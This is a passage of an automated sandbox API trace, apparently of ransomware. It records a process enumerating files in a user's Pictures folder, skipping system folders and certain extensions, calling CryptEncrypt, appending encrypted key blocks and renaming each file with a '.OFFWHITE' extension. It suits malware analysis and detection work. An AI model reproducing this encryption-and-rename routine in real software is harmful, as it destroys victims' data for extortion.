lpNumberOfBytesWritten=0x295d1cc*=0x8, lpOverlapped=0x0) returned 1 [0135.505] GetProcessHeap () returned 0x500000 [0135.505] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x12624) returned 0x55c7c8 [0135.505] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.505] ReadFile (in: hFile=0x218, lpBuffer=0x55c7c8, nNumberOfBytesToRead=0x12624, lpNumberOfBytesRead=0x295d1c0, lpOverlapped=0x0 | out: lpBuffer=0x55c7c8*, lpNumberOfBytesRead=0x295d1c0*=0x12624, lpOverlapped=0x0) returned 1 [0135.510] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.510] WriteFile (in: hFile=0x218, lpBuffer=0x55c7c8*, nNumberOfBytesToWrite=0x12624, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55c7c8*, lpNumberOfBytesWritten=0x295d1cc*=0x12624, lpOverlapped=0x0) returned 1 [0135.510] GetProcessHeap () returned 0x500000 [0135.510] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55c7c8 | out: hHeap=0x500000) returned 1 [0135.510] CloseHandle (hObject=0x218) returned 1 [0135.512] GetProcessHeap () returned 0x500000 [0135.512] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x524e08 | out: hHeap=0x500000) returned 1 [0135.512] GetProcessHeap () returned 0x500000 [0135.512] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x524d00 | out: hHeap=0x500000) returned 1 [0135.512] GetProcessHeap () returned 0x500000 [0135.512] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5314e8 | out: hHeap=0x500000) returned 1 [0135.512] GetProcessHeap () returned 0x500000 [0135.512] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5314d0 | out: hHeap=0x500000) returned 1 [0135.512] lstrcpyW (in: lpString1=0x295cfb8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\CtHTE0PEy.jpg" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\CtHTE0PEy.jpg") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\CtHTE0PEy.jpg" [0135.512] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\CtHTE0PEy.jpg", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\CtHTE0PEy.jpg.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\CtHTE0PEy.jpg.OFFWHITE" [0135.512] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\CtHTE0PEy.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gneccgvdlty7h2sg3p04\\1pomgc9c\\rmts7wxti\\cthte0pey.jpg"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\CtHTE0PEy.jpg.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gneccgvdlty7h2sg3p04\\1pomgc9c\\rmts7wxti\\cthte0pey.jpg.offwhite")) returned 1 [0135.513] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x839b7d20, ftCreationTime.dwHighDateTime=0x1d5d8c5, ftLastAccessTime.dwLowDateTime=0x74a486f0, ftLastAccessTime.dwHighDateTime=0x1d5e44a, ftLastWriteTime.dwLowDateTime=0x74a486f0, ftLastWriteTime.dwHighDateTime=0x1d5e44a, nFileSizeHigh=0x0, nFileSizeLow=0x1c29, dwReserved0=0x295d1bc, dwReserved1=0x3742a4d2, cFileName="d5af6-5l3w.bmp", cAlternateFileName="D5AF6-~1.BMP")) returned 1 [0135.513] lstrcmpiW (lpString1="d5af6-5l3w.bmp", lpString2=".") returned 1 [0135.513] lstrcmpiW (lpString1="d5af6-5l3w.bmp", lpString2="..") returned 1 [0135.513] lstrcmpiW (lpString1="d5af6-5l3w.bmp", lpString2="...") returned 1 [0135.513] lstrcmpiW (lpString1="d5af6-5l3w.bmp", lpString2="windows") returned -1 [0135.513] lstrcmpiW (lpString1="d5af6-5l3w.bmp", lpString2="$recycle.bin") returned 1 [0135.513] lstrcmpiW (lpString1="d5af6-5l3w.bmp", lpString2="rsa") returned -1 [0135.513] lstrcmpiW (lpString1="d5af6-5l3w.bmp", lpString2="ntuser.dat") returned -1 [0135.513] lstrcmpiW (lpString1="d5af6-5l3w.bmp", lpString2="programdata") returned -1 [0135.513] lstrcmpiW (lpString1="d5af6-5l3w.bmp", lpString2="appdata") returned 1 [0135.513] lstrcmpiW (lpString1="d5af6-5l3w.bmp", lpString2="program files") returned -1 [0135.513] lstrcmpiW (lpString1="d5af6-5l3w.bmp", lpString2="program files (x86)") returned -1 [0135.513] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\" [0135.513] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\", lpString2="d5af6-5l3w.bmp" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\d5af6-5l3w.bmp") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\d5af6-5l3w.bmp" [0135.513] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.513] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.513] PathFindExtensionW (pszPath="d5af6-5l3w.bmp") returned=".bmp" [0135.513] lstrcmpiW (lpString1=".bmp", lpString2=".exe") returned -1 [0135.514] lstrcmpiW (lpString1=".bmp", lpString2=".log") returned -1 [0135.514] lstrcmpiW (lpString1=".bmp", lpString2=".cab") returned -1 [0135.514] lstrcmpiW (lpString1=".bmp", lpString2=".cmd") returned -1 [0135.514] lstrcmpiW (lpString1=".bmp", lpString2=".com") returned -1 [0135.514] lstrcmpiW (lpString1=".bmp", lpString2=".cpl") returned -1 [0135.514] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0135.514] lstrcmpiW (lpString1=".bmp", lpString2=".dll") returned -1 [0135.514] lstrcmpiW (lpString1=".bmp", lpString2=".url") returned -1 [0135.514] lstrcmpiW (lpString1=".bmp", lpString2=".ttf") returned -1 [0135.514] lstrcmpiW (lpString1=".bmp", lpString2=".mp3") returned -1 [0135.514] lstrcmpiW (lpString1=".bmp", lpString2=".pif") returned -1 [0135.514] lstrcmpiW (lpString1=".bmp", lpString2=".mp4") returned -1 [0135.514] lstrcmpiW (lpString1=".bmp", lpString2=".OFFWHITE") returned -1 [0135.514] lstrcmpiW (lpString1=".bmp", lpString2=".msi") returned -1 [0135.514] lstrcmpiW (lpString1="d5af6-5l3w.bmp", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0135.514] GetProcessHeap () returned 0x500000 [0135.514] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x531a90 [0135.514] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\d5af6-5l3w.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gneccgvdlty7h2sg3p04\\1pomgc9c\\rmts7wxti\\d5af6-5l3w.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0135.514] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=7209) returned 1 [0135.514] GetProcessHeap () returned 0x500000 [0135.514] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5314d0 [0135.514] GetProcessHeap () returned 0x500000 [0135.514] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5314e8 [0135.514] GetProcessHeap () returned 0x500000 [0135.514] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x524d00 [0135.515] GetProcessHeap () returned 0x500000 [0135.515] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x524e08 [0135.515] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.515] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.515] SystemFunction036 (in: RandomBuffer=0x5314d0, RandomBufferLength=0x10 | out: RandomBuffer=0x5314d0) returned 1 [0135.515] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.515] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.515] SystemFunction036 (in: RandomBuffer=0x5314e8, RandomBufferLength=0x10 | out: RandomBuffer=0x5314e8) returned 1 [0135.515] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.515] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.515] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x524d00*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x524d00*, pdwDataLen=0x295cf90*=0x100) returned 1 [0135.515] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.515] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.515] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x524e08*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x524e08*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0135.515] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x1c29, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.515] SetLastError (dwErrCode=0x0) [0135.515] WriteFile (in: hFile=0x218, lpBuffer=0x524d00*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x524d00*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0135.517] GetLastError () returned 0x0 [0135.517] GetLastError () returned 0x0 [0135.517] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x1d29, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.517] WriteFile (in: hFile=0x218, lpBuffer=0x524e08*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x524e08*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0135.517] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x1e29, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.517] WriteFile (in: hFile=0x218, lpBuffer=0x531a90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x531a90*, lpNumberOfBytesWritten=0x295d1cc*=0x8, lpOverlapped=0x0) returned 1 [0135.517] GetProcessHeap () returned 0x500000 [0135.517] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1c29) returned 0x55c7c8 [0135.517] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.517] ReadFile (in: hFile=0x218, lpBuffer=0x55c7c8, nNumberOfBytesToRead=0x1c29, lpNumberOfBytesRead=0x295d1c0, lpOverlapped=0x0 | out: lpBuffer=0x55c7c8*, lpNumberOfBytesRead=0x295d1c0*=0x1c29, lpOverlapped=0x0) returned 1 [0135.518] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.518] WriteFile (in: hFile=0x218, lpBuffer=0x55c7c8*, nNumberOfBytesToWrite=0x1c29, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55c7c8*, lpNumberOfBytesWritten=0x295d1cc*=0x1c29, lpOverlapped=0x0) returned 1 [0135.518] GetProcessHeap () returned 0x500000 [0135.518] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55c7c8 | out: hHeap=0x500000) returned 1 [0135.518] CloseHandle (hObject=0x218) returned 1 [0135.520] GetProcessHeap () returned 0x500000 [0135.520] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x524d00 | out: hHeap=0x500000) returned 1 [0135.520] GetProcessHeap () returned 0x500000 [0135.520] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x524e08 | out: hHeap=0x500000) returned 1 [0135.520] GetProcessHeap () returned 0x500000 [0135.520] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5314d0 | out: hHeap=0x500000) returned 1 [0135.520] GetProcessHeap () returned 0x500000 [0135.520] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5314e8 | out: hHeap=0x500000) returned 1 [0135.520] lstrcpyW (in: lpString1=0x295cfb8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\d5af6-5l3w.bmp" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\d5af6-5l3w.bmp") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\d5af6-5l3w.bmp" [0135.520] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\d5af6-5l3w.bmp", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\d5af6-5l3w.bmp.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\d5af6-5l3w.bmp.OFFWHITE" [0135.520] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\d5af6-5l3w.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gneccgvdlty7h2sg3p04\\1pomgc9c\\rmts7wxti\\d5af6-5l3w.bmp"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\d5af6-5l3w.bmp.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gneccgvdlty7h2sg3p04\\1pomgc9c\\rmts7wxti\\d5af6-5l3w.bmp.offwhite")) returned 1 [0135.521] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee911780, ftCreationTime.dwHighDateTime=0x1d5dc9d, ftLastAccessTime.dwLowDateTime=0x88830b90, ftLastAccessTime.dwHighDateTime=0x1d5daab, ftLastWriteTime.dwLowDateTime=0x88830b90, ftLastWriteTime.dwHighDateTime=0x1d5daab, nFileSizeHigh=0x0, nFileSizeLow=0x5d12, dwReserved0=0x295d1bc, dwReserved1=0x3742a4d2, cFileName="L7EKR.png", cAlternateFileName="")) returned 1 [0135.521] lstrcmpiW (lpString1="L7EKR.png", lpString2=".") returned 1 [0135.521] lstrcmpiW (lpString1="L7EKR.png", lpString2="..") returned 1 [0135.521] lstrcmpiW (lpString1="L7EKR.png", lpString2="...") returned 1 [0135.521] lstrcmpiW (lpString1="L7EKR.png", lpString2="windows") returned -1 [0135.521] lstrcmpiW (lpString1="L7EKR.png", lpString2="$recycle.bin") returned 1 [0135.521] lstrcmpiW (lpString1="L7EKR.png", lpString2="rsa") returned -1 [0135.521] lstrcmpiW (lpString1="L7EKR.png", lpString2="ntuser.dat") returned -1 [0135.521] lstrcmpiW (lpString1="L7EKR.png", lpString2="programdata") returned -1 [0135.521] lstrcmpiW (lpString1="L7EKR.png", lpString2="appdata") returned 1 [0135.521] lstrcmpiW (lpString1="L7EKR.png", lpString2="program files") returned -1 [0135.521] lstrcmpiW (lpString1="L7EKR.png", lpString2="program files (x86)") returned -1 [0135.521] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\" [0135.521] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\", lpString2="L7EKR.png" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\L7EKR.png") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\L7EKR.png" [0135.521] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.521] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.521] PathFindExtensionW (pszPath="L7EKR.png") returned=".png" [0135.521] lstrcmpiW (lpString1=".png", lpString2=".exe") returned 1 [0135.521] lstrcmpiW (lpString1=".png", lpString2=".log") returned 1 [0135.521] lstrcmpiW (lpString1=".png", lpString2=".cab") returned 1 [0135.521] lstrcmpiW (lpString1=".png", lpString2=".cmd") returned 1 [0135.521] lstrcmpiW (lpString1=".png", lpString2=".com") returned 1 [0135.521] lstrcmpiW (lpString1=".png", lpString2=".cpl") returned 1 [0135.521] lstrcmpiW (lpString1=".png", lpString2=".ini") returned 1 [0135.521] lstrcmpiW (lpString1=".png", lpString2=".dll") returned 1 [0135.521] lstrcmpiW (lpString1=".png", lpString2=".url") returned -1 [0135.521] lstrcmpiW (lpString1=".png", lpString2=".ttf") returned -1 [0135.521] lstrcmpiW (lpString1=".png", lpString2=".mp3") returned 1 [0135.522] lstrcmpiW (lpString1=".png", lpString2=".pif") returned 1 [0135.522] lstrcmpiW (lpString1=".png", lpString2=".mp4") returned 1 [0135.522] lstrcmpiW (lpString1=".png", lpString2=".OFFWHITE") returned 1 [0135.522] lstrcmpiW (lpString1=".png", lpString2=".msi") returned 1 [0135.522] lstrcmpiW (lpString1="L7EKR.png", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0135.522] GetProcessHeap () returned 0x500000 [0135.522] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x531aa0 [0135.522] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\L7EKR.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gneccgvdlty7h2sg3p04\\1pomgc9c\\rmts7wxti\\l7ekr.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0135.522] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=23826) returned 1 [0135.522] GetProcessHeap () returned 0x500000 [0135.522] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5314e8 [0135.522] GetProcessHeap () returned 0x500000 [0135.522] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5314d0 [0135.522] GetProcessHeap () returned 0x500000 [0135.522] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x524e08 [0135.522] GetProcessHeap () returned 0x500000 [0135.522] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x524d00 [0135.522] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.522] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.522] SystemFunction036 (in: RandomBuffer=0x5314e8, RandomBufferLength=0x10 | out: RandomBuffer=0x5314e8) returned 1 [0135.522] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.522] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.522] SystemFunction036 (in: RandomBuffer=0x5314d0, RandomBufferLength=0x10 | out: RandomBuffer=0x5314d0) returned 1 [0135.522] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.522] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.522] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x524e08*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x524e08*, pdwDataLen=0x295cf90*=0x100) returned 1 [0135.523] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.523] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.523] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x524d00*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x524d00*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0135.523] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x5d12, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.523] SetLastError (dwErrCode=0x0) [0135.523] WriteFile (in: hFile=0x218, lpBuffer=0x524e08*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x524e08*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0135.524] GetLastError () returned 0x0 [0135.524] GetLastError () returned 0x0 [0135.524] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x5e12, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.524] WriteFile (in: hFile=0x218, lpBuffer=0x524d00*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x524d00*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0135.525] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x5f12, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.525] WriteFile (in: hFile=0x218, lpBuffer=0x531aa0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x531aa0*, lpNumberOfBytesWritten=0x295d1cc*=0x8, lpOverlapped=0x0) returned 1 [0135.525] GetProcessHeap () returned 0x500000 [0135.525] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x5d12) returned 0x55c7c8 [0135.525] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.525] ReadFile (in: hFile=0x218, lpBuffer=0x55c7c8, nNumberOfBytesToRead=0x5d12, lpNumberOfBytesRead=0x295d1c0, lpOverlapped=0x0 | out: lpBuffer=0x55c7c8*, lpNumberOfBytesRead=0x295d1c0*=0x5d12, lpOverlapped=0x0) returned 1 [0135.527] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.527] WriteFile (in: hFile=0x218, lpBuffer=0x55c7c8*, nNumberOfBytesToWrite=0x5d12, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55c7c8*, lpNumberOfBytesWritten=0x295d1cc*=0x5d12, lpOverlapped=0x0) returned 1 [0135.527] GetProcessHeap () returned 0x500000 [0135.527] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55c7c8 | out: hHeap=0x500000) returned 1 [0135.527] CloseHandle (hObject=0x218) returned 1 [0135.528] GetProcessHeap () returned 0x500000 [0135.528] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x524e08 | out: hHeap=0x500000) returned 1 [0135.528] GetProcessHeap () returned 0x500000 [0135.528] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x524d00 | out: hHeap=0x500000) returned 1 [0135.528] GetProcessHeap () returned 0x500000 [0135.528] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5314e8 | out: hHeap=0x500000) returned 1 [0135.528] GetProcessHeap () returned 0x500000 [0135.528] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5314d0 | out: hHeap=0x500000) returned 1 [0135.528] lstrcpyW (in: lpString1=0x295cfb8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\L7EKR.png" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\L7EKR.png") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\L7EKR.png" [0135.528] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\L7EKR.png", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\L7EKR.png.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\L7EKR.png.OFFWHITE" [0135.528] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\L7EKR.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gneccgvdlty7h2sg3p04\\1pomgc9c\\rmts7wxti\\l7ekr.png"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\L7EKR.png.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gneccgvdlty7h2sg3p04\\1pomgc9c\\rmts7wxti\\l7ekr.png.offwhite")) returned 1 [0135.529] FindNextFileW (in: hFindFile=0x544750, 